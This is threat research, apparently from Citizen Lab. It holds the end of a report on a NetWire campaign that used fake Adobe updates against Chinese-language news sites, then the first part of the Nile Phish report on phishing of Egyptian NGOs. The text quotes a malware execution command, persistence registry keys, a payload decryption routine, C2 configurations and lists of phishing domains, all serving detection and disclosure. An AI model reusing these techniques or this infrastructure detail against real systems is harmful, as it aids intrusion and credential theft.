analysis. The operation combined obfuscated, packed executables, and custom shellcode with an additional step of
using compromised servers to host the malicious payload. We identify the payload as NetWire, a commodity remote
access trojan that is not commonly observed in Asia and typically seen used in cybercrime activities.
Malware server and analysis
Our investigation of the malware operation began with analysis of the server used to host the malware. The malware
server is on the IP address: 23[.]239[.]106[.]119 hosted by GorillaServers, a provider based in the United
States. We found the server by resolving the domain datalink[.]one, which was one of the domains registered by the
operators.
On the server we found domains and copied content mimicking HK01 and Bowen Press, but cannot confirm if these
groups were direct targets of the malware operation or if the content was used as lures to target other groups.
Passive DNS records for the IP address: 23[.]239[.]106[.]119 show a number of other domains that we have
connected to the operators including:
Domains
datalink[.]one
get.adobe.com.bowenpress[.]org
hk.secuerserver[.]com
pop.secuerserver[.]com
smtpout.secuerserver[.]com
www.bowenpress[.]org
www.mail.secuerserver[.]com
www.secuerserver[.]com
www.vnews[.]hk
We found that some of these domains were used as command and control servers for the malware we found hosted
on the domain.
HK01 Lure
When we first investigated the malware server on March 6, 2017 we found it was hosting what appears to be a copy
of the frontpage of HK01, a Hong Kong-based news site (see Figure 10).
13/23
Figure 10: Comparison of real and fake HK01 webpages
The copied version of the HK01 site is missing the centre content displayed on the real site.
Instead it shows a link with the following text:
Adobe Flash Player
[Adobe Flash Player this
version is outdated. Please click].
The link connects to:
hXXp://get.adobe.com.bowenpress.org/Adobe/update/20161201/AdobeUpdate[.]html
Clicking this link initiates a download of an executable and then forwards the user to the legitimate Adobe update
site. These action are done through the following HTML code:
We browsed the directory of 23[.]1239[.]1106[.]119/adobe/update and found three different sub
directories that each served three different executables (see Figure 11). A fourth sub directory and fourth executable
appeared on March 12, 2017. Analysis of these executables shows they are malware.
14/23
Figure 11: Server directory containing malicious executables.
Malware Analysis
The malicious binaries combined obfuscated, packed executables, and custom shellcode with an additional step of
using compromised servers to host the malicious payload. We identify the final payload as NetWire, a commodity
remote access trojan that is not commonly observed in Asia and typically seen used in cybercrime activities.
The four executables we found in the
Adobe update
directory are named to appear as an update for Adobe Flash
followed by a date stamp (e.g., AdobeUpdate20160703.exe).
Each malware file was digitally signed:
File
Certificate Details
AdobeUpdate20160703.exe
Serial: 57 be 1a 00 d2 e5 9b db d1 95 24 aa a1 7e d9 3b
Valid From: Thursday, November 19, 2015 5:45:01 PM
Valid To: Saturday, November 19, 2016 5:45:01 PM
AdobeUpdate20160812.exe
Serial: 68 be c5 c0 26 4c c9 09 6d 2f b2 0a 98 86 e9 4d
Valid From: Monday, June 15, 2015 4:00:00 PM
Valid To: Thursday, June 15, 2017 3:59:59 PM
15/23
File
Certificate Details
AdobeUpdate20161201.exe Elex do Brasil Participa
es Ltda
AdobeUpdate20170312.exe Serial: 06 71 ee 52 6a cb 6f 9b e2 01 f5 a8 e2 03 c4 1c
Valid From: Sunday, April 12, 2015 4:00:00 PM
Valid To: Wednesday, July 12, 2017 3:59:59 PM
All four samples are packed with VMProtect, software used to obfuscate source code to make anaylsis and reverse
engineering more difficult. When executed the samples unpack and drop a second VMProtect-packed DLL to the
following location:
C:\Program Files\Common Files\Microsoft
Shared\VGX\Stub.dll
Before executing the dropped DLL via rundll32 as shown:
rundll32.exe C:\Program Files\Common Files\Microsoft
Shared\VGX\Stub.dll,Install
COM+ Event
This stub DLL unpacks itself and then gains persistence by creating a new autorun service: Log
DLL edits the following registry keys to create this new service:
. The
HKLM\Software\Microsoft\Windows
NT\CurrentVersion\SvcHost\EventSystemLog
HKLM\System\CurrentControlSet\Services\EventSystemLog
HKLM\System\CurrentControlSet002\Services\EventSystemLog
HKLM\System\CurrentControlSet003\Services\EventSystemLog
Once the DLL has gained persistence it starts the newly created service. When run as part of a service, the DLL
unpacks itself and attempts to download what appears to be a jpg file hosted on one of three websites: a Chineselanguage news organization, a University, and a software company.
Each of the 4 samples uses a different URL. Each of these files begins with a 631 byte jpg header followed by
encrypted shellcode. The malware first decrypts the payload immediately after the jpg header using the following
algorithm:
for i = 0; i < len(payload); i++ payload[i] = (16 * ~((((payload[i] ^ 0x50) >> 4) ^
i) & 0xf) & 0xef) ^ payload[i]
The decrypted payload begins with a short header consisting of an unsigned 32 bit integer that is the size of the
stage 2 payload, an unsigned 32 bit integer used as a checksum, and 64 bytes of padding. This header is followed
by a block of shellcode and a second encrypted payload (see Figure 12). The shellcode decrypts the stage 2
payload using RC4 with different 256-bit keys for each sample.
16/23
Figure 12: Hex code showing jpg header followed by encrypted shellcode
This decrypted data contains additional shellcode followed by a PE file. We identify the PE file as the Netwire RAT.
The final stage shellcode acts as a loader and maps the RAT into memory and resolves the RAT
s imports before
jumping to the RAT
s entrypoint.
Netwire RAT is a multi-platform RAT (Remote Access Tool) that first appeared in 2012. Since its appearance,
Netwire RAT has been used in a variety of attacks ranging from stealing credit card data to targeted campaigns
against health care and banking sectors. The Netwire samples we analyzed are capable of a wide-range of behavior
including:
Reading stored usernames and passwords from common apps including:
Web Browsers
Email Clients
17/23
Instant Messaging Clients
Keylogging
Taking Screenshots
Audio capture
Screen recording
Process listing, creation, killing, etc.
Uploading and downloading files
Each of the 4 fake jpg files contains a Netwire sample containing different configuration settings. After analyzing
the samples we recovered the configuration settings for each sample (see Appendix A). The use of multiple layers
of packed or obfuscated payloads is likely an attempt to evade detection and analysis. Downloading the RAT each
time the malware runs could be an attempt to hide the final payload, as the Netwire samples are never written to
disk. This process makes direct analysis difficult without memory images or an understanding of the payload
decryption and shellcode routines to decrypt the RAT manually. Using different configurations for each sample could
be an attempt to use specific domains tailored to each target, or to allow for the use of multiple domains as fallbacks
in case previously used domains are discovered and blocked.
Each of the four binary samples we analyzed downloaded a copy of the Netwire RAT as a different
jpg
file. The
three hosts used are all legitimate servers with active web pages. In each case, the jpg downloaded by the
malware is noticeably larger than other files in the same directory on the server and was last modified more
recently. We believe that each of the three servers used to host the
files have been compromised and that the
operator is using these legitimate servers to host their payload in an effort to hide their activities.
Like the phishing operation, the malware setup shows a significant level of effort. We observe custom shellcode
paired with an additional step of using likely-compromised servers to host the payload. While Netwire has been seen
in some targeted intrusions, it has primarily been used in cybercrime activities and is not common in Asia.
Bowen Press Lures
The earliest domains registered by the operators that follow the pattern of mimicking China related news
organizations were decoys for Bowen Press. The real Bowen Press domain is bowenpress[.]com, the operators
registered bowenpress[.]org. We were unable to retrieve the content that originally appeared on the domains in
2015. However, we were able to find copied Bowen Press content on the malware server through Google searches
on the
news
subdirectory of the server. The content was an iframe of the front page of Bowen Press and results in
rendering additional error messages (See Figure 13). The existence of Bowen Press content on this server
suggests that the operators may have been using Bowen Press lures to serve malware.
18/23
Figure 13: Comparison of real and fake Bowen Press webpages
Additionally,we found the Netwire samples in a directory under the URL
www.bowenpress[.]org/Adobe/update, even though the website serving the sample was a copy of HK01. The
use of this URL path further suggests that the fake Bowen Press domain and content were used to serve malware at
some point. The operators may have simply reused the domain for the HK01 related campaign.
On March 15, 2017, the front page of the malware server was changed to a copy of the Bowen Press website that
mirrored content from the same day (see Figure 14). The copied page did not contain any malicious code and we
were unable to find a log.txt file on the server.
19/23
Figure 14: Screenshot of the malware server on March 15 2017 showing copied content from Bowen
Press.
The only change to the content of the page was the removal of a bot check supplied by WordFence, a security
plugin for the WordPress blogging platform. On March 21, the content was removed and the server returned a blank
page.
We cannot confirm what was the purpose of the recently copied Bowen Press content. However, it shows that the
operators have had a continued interest in using Bowen Press content as lures potentially to serve malware.
Part 4: Campaign Connections
This section links infrastructure used in the campaign against the Chinese-language news sites to previous malware
campaigns targeting a Tibetan Radio Station and the Thai government. It also highlights connections between
certificate information used to sign the Netwire samples we analyzed and malware used in campaigns targeting
gaming companies.
Infrastructure Connections to Malware Operations against Tibetan Radio Station
Domain registration information for some of the infrastructure used in the campaign have links to earlier targeted
malware operations against civil society and government groups in Asia.
The WHOIS records for the domains used in the phishing and malware operations include the phone number (
12126881188). Searching other WHOIS records for this number reveals a known command and control server with
a Tibet theme. The WHOIS information for this domain matches all the fields with the exception of the email
address. All other fields used match including the same address and misspelling of United States as
Uniter States
Domain: www.tibetonline[.]info
Name: free tibet
Mailing Address: Uniter states, Phoenix Arizona 86303
Phone: +1.2126881188
Email: rooterit@outlook.com (admin)
fightfortibet@ymail.com (billing)
The registrant e-mail is linked to another domain in addition to tibetonline[.]info which is rooter[.]tk.
Both these domains are linked to a 2013 campaign targeting Voice of Tibet, an independent radio station reporting
on Tibetan issues. In this campaign, the two domains were reported by ThreatConnect as being used as a
command and control server (rooter[.]tk) and hosting an Adobe Flash heap spray vulnerability (
tibetonline[.]info) as well as an IE exploit (CVE-2013-1347).
Infrastructure Connections to Malware Operations against Thai Government
The domain tibetonline[.]info was also identified by Palo Alto Networks as a command and control server
used for FFRAT malware recently described by Cylance. This infrastructure overlapped with servers used by a
threat actor targeting Thai government entities with the Bookworm trojan in 2015. The general tactics, techniques,
and procedures used by this threat actor also show similarities to the campaign we analysed. Both used the same
hosting provider on one IP: Cloudie HK (103.226.127[.]47), and used fake Adobe updates to lure targets into
installing malware. The threat actor documented by Palo Alto also used fake news site domains (e.g.,
vancouversun[.]us, yomiuri[.]us, voanews[.]hk, and nhknews[.]hk) Finally, both operations
leveraged compromised web servers for command and control.
20/23
Certificate Connections to Malware Targeting Gaming Companies
In October 2016 Cylance disclosed information on a threat actor called
PassCV
, which targeted the gaming
industry and used stolen code signing certificates to sign malware.
The disclosure was an update to information published by Symantec in July 2014 and Kaspersky
s 2013 view into
Winnti.
Cylance lists three malware samples signed with one of the same certificates used to sign one of the Netwire
dropper files in the operation we report on:
57 BE 1A 00 D2 E5 9B DB D1 95 24 AA A1 7E D9
In addition, Cylance also notes the discovery of Netwire being used in the same campaign. The use of Netwire is
notable as it is the only other mention of it being used in Chinese-nexus malware operations of which we are aware.
The disclosure was an update to information published by Symantec in July 2014 and Kaspersky
s 2013 view into
Winnti.
Explaining the Connections
These overlaps point to a number of potential scenarios. The campaign we analyzed may have been conducted by
the same threat actors as the previous operations. Alternatively the overlap may be an artifact of resource sharing
between separate but unrelated threat actors
potentially through the use of a
digital quartermaster
(a group that
supplies operators with malware and other resources), or more informal means. While the first scenario is possible,
we do not have enough information to fully substantiate it. We suspect that at the least there is some level of sharing
and reuse of infrastructure by the same operator or group of operators. The targets in most of these other
campaigns (ethnic minority groups, government in Southeast Asia, and news sites reporting on China) generally fall
into the geopolitical interests and strategic concerns of the government of China. However, we have insufficient
information to conclusively attribute the campaign to a specific threat actor or state sponsor.
Part 5: Discussion and Conclusion
This section summarizes the characteristics of the campaign and how it reflects wider information security
challenges for news organizations and journalism.
A Patient and Persistent Operator
While the tactics used in these campaigns are technically simple, the operators demonstrate patience and
persistence. They have been using content and domains mimicking Chinese-language news sites as lures since at
least 2015, and appear to carefully move from one target to another. The phishing campaign against China Digital
Times was stood up and taken down in the span of 20 days. In this period, the operators scanned the CDT site for
vulnerabilities, registered a lookalike domain, created a fake CDT decoy site, and sent the group a wave of
customized phishing emails. When these efforts were not successful the operators quickly shut down the campaign
and moved on to new targeting. The malware operation also showed efforts to bypass detection and analysis. The
operators combined obfuscated, packed executables and custom shellcode with an additional step of using
compromised servers to host the payload.
The news sites used for lures and targeting in the operation all report on topics seen as politically sensitive by the
government of China, and follow a general pattern of news organizations reporting on China being targeted by digital
21/23
espionage. While there are connections between these targets and the geopolitical concerns of the Chinese
government we cannot conclusively attribute this operation to a state sponsor. What we can clearly determine is that
this operation was conducted by a threat actor active for at least 2 years that targets Chinese language news
organizations with intrusion attempts and appears to carefully move from target to target.
Information Security Challenges for Journalism
This campaign reflects general information security challenges for news organizations and journalists. Journalists
operate in high-paced environments under intense time pressures. As part of their practice, they regularly receive
information from unknown sources in a variety of media (e.g., social media, email, chat messages, etc). Gathering
sources and material requires journalists to be open and accessible online. Journalists also may handle sensitive
information and contacts. Ideally, information security should be part of their standard work process, but information
security is but one consideration out of many other competing priorities. Journalists and management may not have
the same level of awareness or concern for information security threats. Bridging these gaps, balancing conflicting
necessities for openness, availability, and security all within a resource-constrained environment are major
challenges. Nonetheless, information security needs to be addressed.
The case we analyzed (and many others like it) shows journalists and news groups are being targeted by digital
espionage operations designed to access confidential information and systems. The threat is not only against
journalists reporting on China. Previous research has found digital espionage operations targeting journalists
reporting on the Middle East, Latin America, Russia, and elsewhere. More work is needed to understand the nature
of the threats and ways to mitigate them that are sensitive to the practicalities and realities of journalism.
Acknowledgements
We are grateful to China Digital Times, Epoch Times, Bowen Press, and HK01 for their participation.
Thanks to our colleagues for review and assistance: John Scott-Railton, Lotus Ruan, Jeffrey Knockel, Lokman Tsui,
Valkyrie-X Security Research Group, Andrew Hilts, Ron Deibert, and TNG.
This project was supported by the John T. and Catherine D. MacArthur Foundation.
Appendix A: Malware Configuration Settings
File name: 7.jpg
ConnectionString:
email23.secuerserver[.]com:443;
ProxyString: Password: Password
HostId: HostId-%Rand%
Mutex: InstallPath: StartupKeyName1: StartupKeyName2: KeyLoggerFilePath: BoolSettingsByte: 000
ConnectionType: 000
22/23
File name: 8.jpg
ConnectionString:
hk.secuerserver[.]com:443;
ProxyString: Password: Password
HostId: HostId-%Rand%
Mutex: InstallPath: StartupKeyName1: StartupKeyName2: KeyLoggerFilePath: BoolSettingsByte: 000
ConnectionType: 001
File name: HHBcampus.jpg
ConnectionString:
HK.SECUERSERVER[.]COM:443;
ProxyString: Password: Password
HostId: HostId-%Rand%
Mutex: InstallPath: StartupKeyName1: StartupKeyName2: KeyLoggerFilePath: BoolSettingsByte: 000
ConnectionType: 001
Filename: icon_sad.jpg
ConnectionString:
dns.bowenpress[.]org:443;
ProxyString: Password: Password
HostId: HostId-%Rand%
Mutex: InstallPath: StartupKeyName1: StartupKeyName2: KeyLoggerFilePath: BoolSettingsByte: 000
ConnectionType: 001
Appendix B: Indicators Of Compromise
Indicators of compromise for this report can be found on our github page.
23/23
[updated] Nile Phish: Large-Scale Phishing Campaign Targeting Egyptian Civil
Society
citizenlab.org/2017/02/nilephish-report/
2/2/2017
By: John Scott-Railton*, Ramy Raoof***, Bill Marczak*, and Etienne Maynier**
*Senior Researcher, Citizen Lab, ***Senior Research Technologist, Egyptian Initiative for Personal Rights, **Mozilla Open Web Fellow, Citizen
Media coverage: Associated Press, Vice, The Intercept, The Hill, Egyptian Streets, La Stampa, Slate, Cairo Portal, Version2, Al Nabaa,
Middle East Monitor, Al Mesryoon, Netzpolitik (in German).
Click here to read the EIPR report in Arabic.
Update 2/23/2017
Evidence of Two Factor Phishing:
Since publication, Citizen Lab and EIPR have been contacted by a number of additional targets. We are preparing a follow-up report, but we
believe it is important to note that there is now evidence that the Nile Phish operator has engaged in phishing of 2-factor authentication
codes.See: Evidence of 2 Factor Phishing
Key Findings
Egyptian NGOs are currently being targeted by Nile Phish, a large-scale phishing campaign.
Almost all of the targets we identified are also implicated in Case 173, a sprawling legal case brought by the Egyptian government
against NGOs, at ich has been referred to as an
unprecedented crackdown
on Egypt
s civil society.
Nile Phish operators demonstrate an intimate knowledge of Egyptian NGOs, and are able to roll out phishing attacks within hours of
government actions, such as arrests.
Summary
This report describes Nile Phish, an ongoing and extensive phishing campaign against Egyptian civil society. In recent years, Egypt has
witnessed what is widely described as an
unprecedented crackdown,
on both civil society and dissent. Amidst this backdrop, in late
November 2016 Citizen Lab began investigating phishing attempts on staff at the Egyptian Initiative for Personal Rights (EIPR), an Egyptian
organization working on research, advocacy and legal engagement to support basic freedoms and rights.
With the collaboration and assistance of EIPR, our investigation expanded to include seven Egyptian NGOs targeted by Nile Phish. These
seven organizations work on a variety of human rights issues, including political freedoms, gender issues, and freedom of speech. We also
identified individual targets, including Egyptian lawyers, journalists, and independent activists.
With only a handful of exceptions, Nile Phish targets are implicated in Case 173, a legal case brought against NGOs by the Egyptian
government over issues of foreign funding. The phishing campaign also coincides with renewed pressure on these organizations and their
staff by the Egyptian government, in the context of Case 173, including asset freezes, travel bans, forced closures, and arrests.
Our collaborative investigation has documented at least 92 messages sent by Nile Phish, many highly personalized, and sent as recently as
January 31st, 2017. The phishing campaign has included at least two phases, each with distinct phishing tactics and domains. Efforts seem to
have been made to compartmentalize the infrastructure for each phase, but a technical error allowed us to link the servers and conclude that
the two phases were part of a single campaign.
Nile Phish
s sponsor clearly has a strong interest in the activities of Egyptian NGOs, specifically those charged by the Egyptian government in
Case 173. The Nile Phish operator shows intimate familiarity with the targeted NGOs activities, the concerns of their staff, and an ability to
quickly phish on the heels of action by the Egyptian government. For example, we observed phishing against the colleagues of prominent
Egyptian lawyer Azza Soliman, within hours of her arrest in December 2016. The phishing claimed to be a copy of her arrest warrant.
We are not in a position in this report to conclusively attribute Nile Phish to a particular sponsor. However, the scale of the campaign and its
persistence, within the context of other legal pressures and harassment, compound the extremely difficult situation faced by NGOs in Egypt.
Background
1/14
In recent years, political assembly, freedom of speech, independent media, and civic organizing have been increasingly constrained in Egypt.
This concerted effort has been widely called an
unprecedented crackdown
against civil society. One component of this effort has been a
rising tide of official and semi-official allegations of foreign interference and foreign funding against Egypt
s civil society organizations.
In 2011, the Egyptian Government embarked on a wide-ranging legal case charging that many civil society organizations receive foreign
funding, and may be engaged in prohibited or illegal activities. The case is widely viewed as politically-motivated, and an attempt to frustrate
and block the ability of Egyptian civil society to continue its pro-democracy and human rights monitoring work.
As part of Case 173, international organizations (e.g.,the National Democratic Institute) and domestic groups (e.g. the Egyptian Initiative for
Personal Rights) have been subjected to a wide range of legal sanctions, including arrests, travel bans, asset freezes and harsh sentencing.
In 2013, 43 defendants working for international NGOs were sentenced to prison for their work, many in absentia as they had already left the
country.
Now more than 5 years old, Case 173 has been marked by periods of calm, and of intense activity. Initially primarily focused on international
NGOs like the National Democratic Institute and the Konrad Adenauer Foundation, the case has grown increasingly focused on domestic
Egyptian organizations. The 37 organizations known to be accused in the case include respected civil liberties groups, pro-bono law firms,
and organizations working on gender issues. More recently, beginning in Spring 2016, travel bans and asset freezes were placed on staff
members of some domestic organizations under investigation.
As a result, many who work for NGOs named in the case are concerned that their ability to travel may be restricted, and that they may face
arrest, jail time or other forms of punishment. Nile Phish, the campaign described in this report, not only targets these individuals, but uses
deceptions that play directly into these fears and concerns.
The Nile Phish Campaign
In late 2016, Citizen Lab was contacted by the Egyptian Initiative for Personal Rights (EIPR), whose technical team had observed a growing
number of suspicious emails sent to EIPR accounts. The messages had caught the attention of the technical team because multiple
messages arrived at the same time, concerned current events, and seemed to play on emotional themes related to Case 173. EIPR
s team
helped broaden the investigation to a total of seven targeted Egyptian NGOs.
All of the seven Egyptian organizations are also implicated by Case 173. The targets include reputable and respected organizations working
on political and rights issues such as freedom of expression, gender rights, and victims of torture and forced disappearances. Six of the
organizations have agreed to be named in this report and one requested to be referenced anonymously (see Table 1).
Table 1: Egyptian NGOs Known to be Targeted by Nile Phish
Targeted NGO
What they do
Association for Freedom of
Thought and Expression (AFTE)
Legal aid, strategic litigation, and awareness-raising on issues of freedom of expression in Egypt.
Cairo Institute for Human Rights
Studies (CIHRS)
A regional NGO that promotes respect for human rights and democracy in the Arab Region.
Egyptian Commission for Rights
and Freedoms (ECRF)
Egyptian organization defending human rights and tracking violations. Tracks and campaigns
against forced disappearances
Egyptian Initiative for Personal
Rights (EIPR)
Works to strengthen and protect basic rights and freedoms in Egypt through research, advocacy,
and litigation. Areas of work include civil liberties, economic and social rights, and criminal justice.
Nadeem Center for
Rehabilitation of Victims of
Violence (Nadeem)
An anti-torture organization that focuses on assisting victims of torture with rehabilitation, including
providing legal services and social support.
Nazra for Feminist Studies
(Nazra)
Promoting the political participation of women, as well as addressing sexual violence, the
organization treats feminism and gender rights as political and social issues.
Unnamed NGO
This organization has requested that it not be named
In addition to the organizations, we identified a small number of individual targets in Egypt, including well-respected lawyers, journalists, and
activists.
We strongly suspect that there may be other targets, and hope that the Indicators of Targeting that we provide in Appendix A can be used by
systems administrators and others to seek evidence of targeting.
2/14
How The Investigation Began
The first Nile Phish message that we examined, sent by Nile Phish to several Egyptian NGOs on November 24, 2016, was made to appear to
come from the Nadeem Center for Rehabilitation of Victims of Violence (Nadeem), and invited the NGO staff member to participate in a
nonexistent panel discussing Egypt
s draft NGO Act, which was nearing a vote in Parliament. The recipient was invited to visit a link to read
more about the panel.
The operators used language from a real NGO statement that had been circulating, embellishing it with the fake meeting. According to the
carefully crafted fiction, the event was co-sponsored by several other NGOs, including EIPR, the Cairo Institute for Human Rights Studies
(CIHRS) and Nazra for Feminist Studies (Nazra). These NGOs were signatories of the legitimate statement. Interestingly Nadeem, EIPR,
CIHRS, and Nazra were all later targeted by the same phishing campaign.
Nov 24 Message Excerpt (Translated)
The state has already taken real steps to eliminate Egyptian civil society organizations by
prosecuting case no. 173/2011 on foreign funding, and several organizations and their current and former directors have been banned from
travel and have had their assets frozen. This new law, however, would pave the way for the eradication of any sort of civic action geared to
development, charitable activities, and services..
Therefore, El Nadeem will organize jointly with political parties and ngos a panel to discuss the status of the civil society organizations in
Egypt in the light of the new act beside the restrictions practiced by the security authorities such as travel ban and assesses free, and others
restrictive to societal and development work in Egypt.
[Link to the agenda and to register for the event]
The link led to a site designed to trick the target into believing that they needed to enter their password to view the file. After confirming that
the message was a phishing attack, we began investigation in close collaboration with EIPR
s technical team, which was by then observing a
second wave of messages claiming to share a document that listed individuals subject to travel bans. The recipients were the staff of Egyptian
civil society organizations, many of whom suspected that they might be included on these lists.
We have now documented at least 92 messages from Nile Phish, which we link together by use of the same servers and phishing toolkit. The
majority of the emails were sent to the work accounts of the targets. The messages have targeted at least seven organizations, as well as a
number of individual activists, lawyers, and journalists. Almost all of the targets are staff of organizations that are defendants in Case 173.
The campaign falls into two phases, which map both onto phishing style, and to different server infrastructure (See: Nile Phish Infrastructure)
What is Phishing?
Phishing is a tactic to steal personal information, like passwords, through deception. Many phishing emails often try to trick you into entering
passwords and other secret codes into websites that look legitimate, but are really fake.
While phishing can be used by criminal gangs to steal bank information and for other financial crimes, phishing is also used for espionage and
surveillance. For example, the Nile Phish operation seems to be designed to gain access to email accounts and document sharing files
belonging to NGOs.
Phase 1: Arrest warrants, invitations, and travel ban lists
Late November- Late December 2016
In the first phase of the phishing (approximately November 24-December 26, 2016) a majority of the messages were crafted with references
to the ongoing crackdown on civil society, and especially Case 173. Typically, the messages masqueraded as document shares, primarily via
Google or Dropbox, containing highly relevant or sensitive information.
The following example of a phishing email that leveraged a recent arrest of a prominent Egyptian lawyer as a lure, illustrates that the phishing
was both extremely timely, and conducted by those well aware of the activities of the Egyptian government. Specifically, it suggests that within
a few hours of an arrest, the operator of the campaign was using this event as part of their phishing attack.
An Arrest Becomes Phishing
On December 7, 2016 prominent Egyptian lawyer and the Director of the Center for Women
s Legal Assistance Azza Soliman was arrested at
her home. Within hours, while Soliman was still being interrogated at the police station, several of her colleagues in other NGOs received an
email purporting to be a Dropbox share of her arrest warrant. (See: Figure 1).
3/14
Figure 1. Phishing email purporting to share
Arrest Warrant Against Azza Soliman.pdf
Clicking on the link leads to a Dropbox credential phishing page pre-populated with the target
s username.
Figure 2: A fake Dropbox login page pre-populated with the identity of the target.
A majority of the Phase 1 messages concerned the court case, and were typically sent to targets
organizational emails. Where targets were
independent activists, we also found targeting of their personal email accounts.
Example Domains from Phase 1 Phishing
Theme
Pretext
Some Targeted
NGOs
Example Domains
Trial
related
Share of travel ban list
EIPR
dropboxsupport.servehttp[.]com
Trial
related
Arrest warrant of an activist arrested on the
same day
Nadeem
dropbox-service.serveftp[.]com, googledriversign.ddns[.]net
Trial
related
Panel invitation to discuss the case
[unnamed group]
mailgooglesign.servehttp[.]com
Trial
related
NGO letter to the Egyptian President about
the case
CIHRS
dropbox-sign.servehttp[.]com
4/14
A majority of the messages were sent using Gmail accounts with names that look like legitimate services. This approach does not hold up to
close scrutiny of the sender
s email addresses, but also allows the message to be sent via a sender known to Gmail, and thus not flagged by
Gmail as sent over an insecure connection.
Masquerading As
Lookalike Email
Dropbox
Gmail
customerserviceonlineteam@gmail.com,
dropbox.notfication@gmail.com,dropbox.notifications.mails@gmail.com,
dropbox.noreplay@gmail.com
drive.noreply.mail@gmail.com,secure.policy.check@gmail.com
(Phase 2)
Phase 2: A Tactical Shift
Mid-December
January 31st 2016 (ongoing)
When we began systematically tracking the campaign in late November 2016 almost all of the messages we observed concerned issues
related to Case 173, as well as being personalized to the recipient. This approach continued until late December. However, by mid-December,
we began observing a growing number of generic phishing messages, mostly emphasizing account security issues.
Here is an example of such a
generic,
but still personalized message.
Figure 3: Fake Gmail failed login warning message
These messages, while still personalized with users
names, relied on a range of common phishing tactics, such as warnings of suspicious
login attempts, and other account security issues. In a few cases, the operators also included package-delivery notifications. After December
26, we no longer observed any personalized messages. This shift maps onto changes in server infrastructure (see: Nile Phish Infrastructure).
Example Domains from Phase 2 Phishing
5/14
Theme
Pretext
Some Targeted NGOs
Example Domains
Gmail
Phishing
Failed login,
insecure
connection,
EIPR, AFTE, CIHRS, Nazra, ECRF,
a prominent journalist
googleverify-signin.servehttp[.]com,
googlesignin.servehttp[.]com, securitymyaccount.servehttp[.]com
It is unclear why Nile Phish operators wound-down their use of Case 173 themes as the campaign went on. It is possible, for example, that
they began to suspect that the targets were wary of such messages. It is equally possible that they simply decided to scale back some of their
efforts, and rely more heavily on the pre-built examples in the toolkit they used. It is also possible that this represents a fluke either in how the
messages were collected, or a pause on the part of the operators.
The final possibility is that Nile Phish is a component of a larger operation, and that the operators may intend to continue to use tailored social
engineering for other purposes, such as delivering malware.
Artefacts: Egyptian Chat Slang
While examining the credential landing pages we also found messages and comments that the Nile Phish operators had left for each other.
The writing is instantly recognizable as a form of Egyptian Arabic slang (mixing letters and characters) sometimes referred as Araby.
Highlighted text:
Will remove the cookies from here and point it to our server
Highlighted text:
Here we will insert the default username page
Highlighted text:
And here too take care
Nile Phish Using Open-Source Phishing Toolkit
Nile Phish mounted this campaign with gophish, an open-source phishing framework written in the Go language.
The gophish framework is intended to be used defensively, as part of anti-phishing trainings. This is the first offensive use of gophish of which
we are aware. Its developer describes it as
designed for businesses and penetration testers. It provides the ability to quickly and easily
setup and execute phishing engagements and security awareness training.
Support for capturing credentials submitted on phishing pages
was added to gophish in February 2016.
6/14
The growing number of open-source and widely available phishing frameworks designed for penetration testing have made it easy to set up a
phishing campaign. While some free and hosted phishing frameworks require a degree of authentication onto a particular domain, such as the
online Duo Insight, many that are self-hosted do not. The lack of authentication, while minimizing invasiveness and protecting user privacy, is
also a double-edged sword, and means that it can be abused to conduct non-consensual and illegal phishing campaigns.
Discovery and Identification
Examination of the phishing infrastructure provided evidence of artefacts from a cloned git repository, suggesting that this was a likely from a
project on Github. This led us to conclude that the operators were likely making use of an existing phishing framework. Further investigation
revealed that the domains were serving the gophish admin page on port 7777, and the scheme of the phishing URLs matched those of
gophish.
Figure 4: Screenshot of gophish admin interface
Gophish links have a common format, which can be used to quickly identify a link sent via the platform.
Gophish link
http://[domain]/?rid=[target identifier string]
Contact with Gophish
Citizen Lab contacted Jordan Wright, the developer of Gophish and provided examples of the links used in the campaign. Wright provided us
the following response:
The links have the same structure as those sent in a Gophish campaign and there are Gophish administrative portals available on those
hosts.
Gophish is designed to help administrators test their organization
s exposure to phishing. By running phishing tests against one
s own
organization, the hope is that members of the organization will be better at spotting and avoiding phishing emails in the future, mitigating
attacks like this.
The Gophish team does not condone using the software for any purpose other than running controlled tests to measure your own
organization
s exposure to phishing. While we cannot control users and prevent all misuse of the software, we will continue taking any
measures possible to prevent this kind of abuse in the future.
Nile Phish Infrastructure
The campaign
s operators used commercial web hosting located in Europe ( Choopa and AlexHost) to host the campaign. They have shown
evidence of basic operational security practices, including server compartmentation between Phase 1 and Phase 2. Nevertheless, in what
appears to have been a mistake, one domain resolved to servers from both phases at different times.
7/14
Using passive DNS analysis tools including PassiveTotal, we were able to further characterize the infrastructure, and how it was used
throughout Phase 1 and Phase 2 of the campaign. We also identified an additional 13 domains through passive DNS research, indicating that
the campaign may include a range of other targets not uncovered in our investigation.
Phase 1 Infrastructure
Using passive DNS we found that Phase 1 included at least six domains, all hosted on 108.61.176[.]96.
googledrive-sign.servehttp[.]com
dropboxsupport.servehttp[.]com
googledriver-sign.ddns[.]net
dropbox-service.serveftp[.]com
dropbox-sign.servehttp[.]com
mailgooglesign.servehttp[.]com
Phase 2 Infrastructure
The second phase of the campaign included at least 16 domains, hosted on IPs 104.238.191[.]204 and 176.123.26[.]42.
fedex-shipping.servehttp[.]com
verification-acc.servehttp[.]com
google-maps.servehttp[.]com
fedex-mail.servehttp[.]com
secure-team.servehttp[.]com
account-google.serveftp[.]com
googleverify-signin.servehttp[.]com
googlesecure-serv.servehttp[.]com
googlesignin.servehttp[.]com
security-myaccount.servehttp[.]com
myaccount.servehttp[.]com
activate-google.servehttp[.]com
googlemaps.servehttp[.]com
device-activation.servehttp[.]com
aramex-shipping.servehttp[.]com
fedex-sign.servehttp[.]com
Additional Domains
Through passive DNS research, we identified 13 additional domains using the same dynamic DNS server and IP addresses.
dropbox-verfy.servehttp[.]com
fedex-s.servehttp[.]com
watchyoutube.servehttp[.]com
moi-gov.serveftp[.]com
verification-team.servehttp[.]com
securityteam-notify.servehttp[.]com
secure-alert.servehttp[.]com
quota-notification.servehttp[.]com
notification-team.servehttp[.]com
fedex-notification.servehttp[.]com
docs-mails.servehttp[.]com
restricted-videos.servehttp[.]com
dropboxnotification.servehttp[.]com
Linking the Infrastructure
While the operators maintained a degree of compartmentation between domains, we found that the domain fedex-sign.servehttp[.]com
resolved to both Phase 1 and Phase 2 infrastructure.
Domain
Resolution
Until
Infrastructure Belongs to
fedex-sign.servehttp[.]com
108.61.176[.]96
13 December 2017
Phase 1
8/14
104.238.191[.]204
19 December 2017
Phase 2
Phishing: The Royal Road to Account Compromise
Reporting on targeted threats often gets attention because of the sophistication of the attackers
tools, yet by volume many successful attacks
